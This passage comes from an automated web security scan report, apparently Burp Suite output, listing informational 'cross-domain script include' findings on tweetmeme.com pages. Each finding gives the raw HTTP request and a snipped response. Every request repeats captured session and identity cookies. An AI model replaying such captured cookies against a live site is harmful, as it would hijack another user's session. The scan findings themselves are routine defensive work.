Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:50:52 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0061120986938477
X-Served-In: 0.050559997558594
X-Served-By: h03
Content-Length: 54800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.439. http://tweetmeme.com/update/ping

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /update/ping

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdNyAUAAAAAAMXjazV5pTkf5sm7o5d_v4htKEne
  • http://static.fmpub.net/site/tweetmeme

Request

GET /update/ping HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:59:22 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0028672218322754
X-Served-In: 0.01808500289917
X-Served-By: ded2062
Content-Length: 25879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Twe
...[SNIP]...
</style>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdNyAUAAAAAAMXjazV5pTkf5sm7o5d_v4htKEne"></script>
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.440. http://tweetmeme.com/user/DhilipSiva_Film

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/DhilipSiva_Film

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/DhilipSiva_Film HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.003242015838623
X-Served-In: 2.073310136795
X-Served-By: h00
Content-Length: 38700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Dhi
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.441. http://tweetmeme.com/user/DodgersLakers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/DodgersLakers

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/DodgersLakers HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:09 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0025711059570312
X-Served-In: 1.5864078998566
X-Served-By: ded2060
Content-Length: 39731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Dod
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.442. http://tweetmeme.com/user/HarveyLevinTMZ

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/HarveyLevinTMZ

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/HarveyLevinTMZ HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0032989978790283
X-Served-In: 1.6071109771729
X-Served-By: ded2060
Content-Length: 37508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Har
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.443. http://tweetmeme.com/user/Illlliam

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/Illlliam

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/Illlliam HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:35 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0027229785919189
X-Served-In: 1.6164269447327
X-Served-By: h03
Content-Length: 38809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Ill
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.444. http://tweetmeme.com/user/JMayisKING

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/JMayisKING

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/JMayisKING HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:35 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0024230480194092
X-Served-In: 1.4324362277985
X-Served-By: h02
Content-Length: 34083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
JMa
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.445. http://tweetmeme.com/user/KDthunderup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/KDthunderup

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/KDthunderup HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:18 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037009716033936
X-Served-In: 0.68862390518188
X-Served-By: h02
Content-Length: 27942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
KDt
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.446. http://tweetmeme.com/user/OnJonasDubu

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/OnJonasDubu

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/OnJonasDubu HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:40 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0030560493469238
X-Served-In: 0.88949203491211
X-Served-By: h02
Content-Length: 37545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
OnJ
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.447. http://tweetmeme.com/user/RWW

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/RWW

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/RWW HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:05 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0054531097412109
X-Served-In: 1.353590965271
X-Served-By: ded2061
Content-Length: 38834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
RWW
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.448. http://tweetmeme.com/user/TechCrunch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/TechCrunch

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/TechCrunch HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:20 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0027718544006348
X-Served-In: 1.540342092514
X-Served-By: ded2059
Content-Length: 39323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Tec
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.449. http://tweetmeme.com/user/YoPretty

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/YoPretty

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/YoPretty HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:53:01 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0019288063049316
X-Served-In: 1.5181400775909
X-Served-By: h03
Content-Length: 29797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
YoP
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.450. http://tweetmeme.com/user/acorvelli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/acorvelli

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/acorvelli HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:52:05 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0026319026947021
X-Served-In: 1.3433458805084
X-Served-By: h02
Content-Length: 39890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
aco
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.451. http://tweetmeme.com/user/alexia

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/alexia

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/alexia HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:19 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0044820308685303
X-Served-In: 1.8648369312286
X-Served-By: h01
Content-Length: 39176

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
ale
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.452. http://tweetmeme.com/user/allkpop

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/allkpop

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/allkpop HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:36 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0036659240722656
X-Served-In: 1.7269580364227
X-Served-By: h01
Content-Length: 39202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
all
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.453. http://tweetmeme.com/user/britneyspears

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/britneyspears

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/britneyspears HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:51:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0026390552520752
X-Served-In: 1.5657958984375
X-Served-By: h02
Content-Length: 29782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
bri
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.454. http://tweetmeme.com/user/carbonmeme

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /user/carbonmeme

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /user/carbonmeme HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:53:12 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0038061141967773
X-Served-In: 1.6207311153412
X-Served-By: h01
